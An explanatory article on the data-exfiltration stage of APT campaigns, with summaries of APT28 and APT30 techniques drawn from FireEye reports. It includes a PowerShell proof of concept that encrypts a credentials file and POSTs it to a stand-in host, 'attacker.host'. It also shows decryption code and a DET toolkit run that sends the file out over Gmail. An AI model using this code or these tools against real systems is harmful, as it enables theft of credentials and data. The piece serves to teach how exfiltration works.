# [Stages of APT]DATA EXFILTRATION

After a successful asset discovery adversaries try to exfiltrate data from the compromised network. In many cases the initial C&C is used as the drop-off point. However, other systems and technologies might be involved [1]. The actual approach of the exfiltration depends on APT group’s tactics, data amount and other circumstances.

When the amount of data is not big, attackers are less restricted with the choices of data transfer and usually can exfiltrate collected information in one round. For this purpose, any of the most common techniques can be used including HTTP, mail, ftp, etc. In cases of huge data transfers, adversaries attempt to distribute the data exfiltration technique in order to not rise red flags. Moreover, depending on egress filtering and other circumstances attackers might limit themselves to a certain protocol which allows to blend in and remain stealthy.

Depending on the APT’s tactics and the goal of the current campaign, the successful data exfiltration marks the end of the attack. However, sometimes the threat actors might put additional effort into covering their tracks or deploying additional persistence mechanisms in case a return is pre-planned for the future.

Data Exfiltration Techniques

Before the actual data exfiltration takes place attackers usually compress, encrypt or encode the payload which is about to be sent to the attackers’ server. This is usually done by the backdoor itself or by using a third party tool, such as archiving software WinRAR. Usage of such techniques allows attackers to minimize the data being exfiltrated and obfuscates its contents in order to bypass network monitoring.

The following basic example of data exfiltration relies on PowerShell. The provided proof of concept code reads contents of a file from the local system, encrypts it with a variation of Advanced Encryption Standard (AES) and sends it to the attacker’s server via HTTP over the port 80. In most cases this approach raises no alarms and therefore can be used to perform stealth exfiltration.

$file = Get-Content C:\Users\RayC\Desktop\facebook_password.txt$key = (New-Object System.Text.ASCIIEncoding).GetBytes("54b8617eca0e54c7d3c8e6732c6b687a")
$securestring = new-object System.Security.SecureString foreach ($char in $file.toCharArray()) {$secureString.AppendChar($char) }$encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key$key

Invoke-WebRequest -Uri http://www.attacker.host/exfil -Method POST -Body $encryptedData Once the PowerShell code is executed the following HTTP POST request is sent to the attacker’s server. POST /exfil HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.3; en-GB) WindowsPowerShell/4.0 Content-Type: application/x-www-form-urlencoded Host: www.attacker.host Content-Length: 704 Expect: 100-continue Connection: Keep-Alive 76492d1116743f0423413b16050a5345MgB8AEIANQBHADAAUgA0AEgAbABOAE8AcwA4AFMAWAB5AG4AKwBEAHQAdgBrAGcAPQA9AHwAMgBiAGIANQBhADgANgA0AGEAZgBhAGEANwA2ADMAMwA4ADAANABjADUAYQA5ADAAMAA1AGIAMAA4ADgANwAyADkAYgA0ADEAMgBjADcAYQA3ADcAYQAyADcANQAyADUANQA4ADgANAA4AGEAOQA4AGUAMwA1ADkANwA5AGQAYQA4ADcAMABjADIAOAA3ADIANQA5ADMAZQBhAGEAOQBiADgAYQA0ADMAOAA3ADYAZQAwADYAZQBlADcAMQBlADQAZQA0ADkAMgBmADgAYQA5ADQANgA2ADcAMwBhADQANAA3AGYANABiAGQAYgAwADUAOABhADAANABjADkAYQBjAGQAZQBkAGMANQA2ADgAZAA5ADYAMAA4ADgANABhADUANwBiAGIAMABhAGUANAAyADcAYQAzADEANABkADMAYgA1AGUAYgAyADkAOQBiADcAYgA3ADIAMwBkADcANQA2AGMANABlADMAZQA5AGMANwA5ADMAMwA1ADEAMABmAGEAMQA0ADIAMgAxADcAZQA0AGUAZgA2AGQANgBlADkAMgBmADkAZgBiADkAOQBjADIAYQAxAGIAOAAyADkAOABmAA== Decryption of the data is straight forward and can be performed with a few lines of PowerShell code as shown below. $key = (New-Object System.Text.ASCIIEncoding).GetBytes("54b8617eca0e54c7d3c8e6732c6b687a")
$encrypted = "76492d1116743f0423413b16050a5345MgB8AEIANQBHADAAUgA0AEgAbABOAE8AcwA4AFMAWAB5AG4AKwBEAHQAdgBrAGcAPQA9AHwAMgBiAGIANQBhADgANgA0AGEAZgBhAGEANwA2ADMAMwA4ADAANABjADUAYQA5ADAAMAA1AGIAMAA4ADgANwAyADkAYgA0ADEAMgBjADcAYQA3ADcAYQAyADcANQAyADUANQA4ADgANAA4AGEAOQA4AGUAMwA1ADkANwA5AGQAYQA4ADcAMABjADIAOAA3ADIANQA5ADMAZQBhAGEAOQBiADgAYQA0ADMAOAA3ADYAZQAwADYAZQBlADcAMQBlADQAZQA0ADkAMgBmADgAYQA5ADQANgA2ADcAMwBhADQANAA3AGYANABiAGQAYgAwADUAOABhADAANABjADkAYQBjAGQAZQBkAGMANQA2ADgAZAA5ADYAMAA4ADgANABhADUANwBiAGIAMABhAGUANAAyADcAYQAzADEANABkADMAYgA1AGUAYgAyADkAOQBiADcAYgA3ADIAMwBkADcANQA2AGMANABlADMAZQA5AGMANwA5ADMAMwA1ADEAMABmAGEAMQA0ADIAMgAxADcAZQA0AGUAZgA2AGQANgBlADkAMgBmADkAZgBiADkAOQBjADIAYQAxAGIAOAAyADkAOABmAA==" echo$encrypted | ConvertTo-SecureString -key $key | ForEach-Object {[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($_))}

Other common techniques of exfiltrating data include SMTP/IMAP and DNS protocols. An example of such techniques can be illustrated by using a Data Exfiltration Toolkit (DET). This tool supports a wide variety of data exfiltration techniques starting from a basic exfiltration over a TCP or UDP tunnel and ending with cloud based services like Gmail, Twitter or Google Docs. DET has the capability to perform prior compression and AES encryption of the payload. Additionally, a feature to define random time intervals between data bursts and the size of the data burst allows to blend the exfiltration traffic into regular network traffic generated by the user and thus making identification of data leakage difficult. The following command line and output illustrates an attempt to exfiltrate data over SMTP protocol by using a predefined mail box.

C:\Users\RayC\>det.py -c config -f Desktop\facebook_password.txt -p gmail
[2016-08-28.19:43:03] CTRL+C to kill DET
[2016-08-28.19:43:03] Launching thread for file Desktop\facebook_password.txt
[2016-08-28.19:43:03] Using gmail as transport method
[2016-08-28.19:43:03] [!] Registering packet for the file
[2016-08-28.19:43:04] [gmail] Sending 77 bytes in mail
[2016-08-28.19:43:05] Sleeping for 1 seconds
[2016-08-28.19:43:06] Using gmail as transport method
[2016-08-28.19:43:06] [gmail] Sending 174 bytes in mail
[2016-08-28.19:43:07] Sleeping for 1 seconds
[2016-08-28.19:43:08] Using gmail as transport method
[2016-08-28.19:43:09] [gmail] Sending 18 bytes in mail

Meanwhile, on the attacker’s server a DET listener is running and monitoring the same mail box for incoming files.

$det.py -c config -L -p gmail [2016-08-28.19:46:04] CTRL+C to kill DET [2016-08-28.19:46:04] [gmail] Listening for mails... [2016-08-28.19:46:08] Received 77 bytes [2016-08-28.19:46:08] Register packet for file facebook_password.txt with checksum 420f595dce0dd2f9d54f66764766f699 [2016-08-28.19:46:11] Received 174 bytes [2016-08-28.19:46:13] Received 18 bytes [2016-08-28.19:46:13] File facebook_password.txt recovered [2016-08-28.19:46:18] Killing DET and its subprocesses$ cat facebook_password.txt
username: johndoe
password: YouWillNewverGuess!!!

Sometimes the information which is interesting for attackers is located on networks having no internet access. In such cases adversaries deploy more sophisticated malware which is able to breach those air-gapped networks and exfiltrate data. While various studies have been conducted to invent and validate techniques for data exfiltration from air-gapped networks, the most common technique used in the wild is USB drive based exfiltration. This technique relies on infecting a USB drive on the internet connected computer which later results to infection of an isolated system when the infected drive is attached to such a system. After the malware collected files from the air-gapped system, it stores those files on the same USB drive so that files can be retrieved when the drive is inserted into initial system. From this point, any of previously mentioned techniques can be used to exfiltrate the collected information from the target’s infrastructure.

Real World Example: APT28 / Sofacy

Two main techniques implemented in backdoors used during APT28 campaigns rely on data exfiltration using the HTTP and the SMTP protocols. One more technique used by Sofacy focuses on infiltration into air-gapped networks by using local file copying as means of data exfiltration. The TTPs used by the CHOPSTICK backdoor involves usage of temporary storage locations based on files and mail slots, data encryption and HTTP protocol as means of exfiltration channel.

The first step of APT28’s malware exfiltration procedure is temporary file creation. This file is later used to store information retrieved from a mail slot which is used by multiple malware components. Before dumping the information to the temporary file, the contents of mail slot records are encrypted with RC4. Finally, the contents of the temporary file are encoded with a URL-safe Base64 encoding and sent to the C&C via HTTP POST request [2]. Table 1 describes this technique in more detail.

Other backdoors, used by APT28, rely on SMTP for data exfiltration. In this case, collected data is encrypted with RSA public key and then sent as an email attachment. The receiver email address is usually predefined within the configuration or the malware binary itself. More details on this technique is provided in Table 2 [2].

Real World Example: APT30

The APT30 group uses their second stage C&C server as a drop-off point. This server collects both: initial system information sent over HTTP POST requests and files being exfiltrated during an interactive TCP session. The initial system information which is being exfiltrated contains the computer name, victim’s IP address, version of the malware that is installed and other configuration data. The format of the data depends on the backdoor’s version and thus might be plain-text or encrypted. In case of interactive exfiltration over a TCP session, the threat actor first locates the files of interest via the GUI application. During this activity, the information transmitted between the controller and the victim contains only the metadata. This approach is used in order to reduce network traffic in order to stay under the radar. Once a file is selected, its contents gets transmitted over a TCP session to the second stage C&C server.

Exfiltration of information from systems which have no or limited network connectivity, APT30 uses it’s BACKPACE ZJ-Listen and ZJ-Link tandem or removable storage toolkit which consists of SHIPSHAPE, SPACESHIP and FLASHFLOOD. These components create a virtual bridge to the internet and thus allow data to be moved between isolated systems. In addition, FLASHFLOOD and SPACESHIP collects interesting files to predefined locations and perform a zlib compression. Moreover, further data obfuscation is achieved by performing byte rotation and XOR encryption. Finally, it was discovered that files collected by FLASHFLOOD to a location %WINDIR%$NtUninstallKB885884$ were configured to be automatically uploaded by one of BACKSPACE’s variant – ZJ Auto [3].

References

1. Professor Awais Rashid, D. R. (2014). Detecting and Preventing Data Exfiltration. Lancaster University.
https://www.cpni.gov.uk/Documents/Publications/2014/2014-04-11-de_lancaster_technical_report.pdf

2. FireEye, Inc. (2014). APT28: A Window int Russia’s Cyber Espionage Operations?
https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf

3. Fireeye Labs. (2015). APT30 and the mechanics of a long-running cyber espionage operation.
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Categories: